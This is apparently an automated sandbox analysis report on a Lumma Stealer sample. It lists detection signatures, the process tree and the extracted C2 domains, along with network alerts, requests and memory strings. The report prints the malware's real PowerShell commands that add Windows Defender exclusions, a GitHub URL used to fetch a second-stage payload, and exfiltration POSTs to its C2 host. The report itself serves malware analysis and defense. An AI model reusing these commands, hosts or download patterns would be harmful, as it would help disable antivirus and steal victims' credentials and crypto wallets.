Windows Analysis Report
eXbhgU9.exe

Overview

General Information

Sample name: eXbhgU9.exe
Analysis ID: 1582366
MD5: 9be5ac720dcf1838fd5a2d7352672f66
SHA1: d8046191a1d1756768a8bad62ce3ba757deb7d53
SHA256: cc5eb5ac7cb599572a1c9747efa83774221e0ad4a24ed6545d5bc03a44a23196
Tags: exe, lumma, user-juroots

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • eXbhgU9.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\eXbhgU9.exe" MD5: 9BE5AC720DCF1838FD5A2D7352672F66)
    • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7456 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7660 cmdline: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jyidkjkfhjawd.exe (PID: 7940 cmdline: "C:\FkSpRTrp\jyidkjkfhjawd.exe" MD5: 1B40450E11F71DA7D6F3D9C025C078E0)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "noisycuttej.shop", "cloudewahsj.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop", "abruptyopsn.shoph"], "Build id": "nbYRKl--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000003.1861666105.00000000013DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000003.1874370927.00000000013DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\eXbhgU9.exe", ParentImage: C:\Users\user\Desktop\eXbhgU9.exe, ParentProcessId: 7340, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', ProcessId: 7456, ProcessName: powershell.exe

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\eXbhgU9.exe", ParentImage: C:\Users\user\Desktop\eXbhgU9.exe, ParentProcessId: 7340, ParentProcessName: eXbhgU9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp', ProcessId: 7456, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:59:39.044317+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:39.955988+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:41.382705+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:42.507623+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:43.769545+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:45.317754+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:57.871611+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:59.961086+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:39.509278+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:40.414271+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 104.21.18.19 | 443 | TCP
2024-12-30T12:00:00.427219+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:39.509278+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:40.414271+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:56.966943+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 104.21.18.19 | 443 | TCP
2024-12-30T11:59:57.922786+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 104.21.18.19 | 443 | TCP

AV Detection

Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Avira: detection malicious, Label: HEUR/AGEN.1314134
Source: jyidkjkfhjawd.exe.7940.7.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "noisycuttej.shop", "cloudewahsj.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop", "abruptyopsn.shoph"], "Build id": "nbYRKl--"}
Source: eXbhgU9.exe | ReversingLabs: Detection: 13%
Source: eXbhgU9.exe | Virustotal: Detection: 22%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Joe Sandbox ML: detected
Source: eXbhgU9.exe | Joe Sandbox ML: detected
Source: 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp
String decryptor:
  cloudewahsj.shop
  rabidcowse.shop
  noisycuttej.shop
  tirepublicerj.shop
  framekgirus.shop
  wholersorie.shop
  abruptyopsn.shop
  nearycrepso.shop
  framekgirus.shop
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  nbYRKl--
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: eXbhgU9.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb | source: eXbhgU9.exe
Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Adobe
Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google
Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local
Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49744 -> 104.21.18.19:443
Source: Malware configuration extractor | URLs: tirepublicerj.shop, wholersorie.shop, rabidcowse.shop, noisycuttej.shop, cloudewahsj.shop, nearycrepso.shop, abruptyopsn.shop, framekgirus.shop, abruptyopsn.shoph
Source: global traffic | HTTP traffic detected: GET /arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 140.82.121.4
Source: Joe Sandbox View | IP Address: 185.199.110.133
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.18.19:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.18.19:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: framekgirus.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 42 | Host: framekgirus.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=JZVI9SMSXV6J | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18122 | Host: framekgirus.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ONFA21ZDLTMDHK1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8761 | Host: framekgirus.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=441RW6H328 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20384 | Host: framekgirus.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=99SFX13IJKICJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1239 | Host: framekgirus.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XE2IAUBU8RSB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 584180 | Host: framekgirus.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: framekgirus.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: framekgirus.shop
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: framekgirus.shop
                Source: powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.000000000275C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.000000000275C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                Source: powershell.exe, 00000002.00000002.1702719661.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1702719661.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.1702719661.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000002.00000002.1702719661.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860623456.0000000001436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/25
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/B5
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1877546668.0000000001441000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878429247.0000000001445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/R5J
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/Vg
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/Y
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860108346.00000000042B2000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034658260.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/api
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/api7
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/api_
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/h
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/j5B
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/s
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/z5R
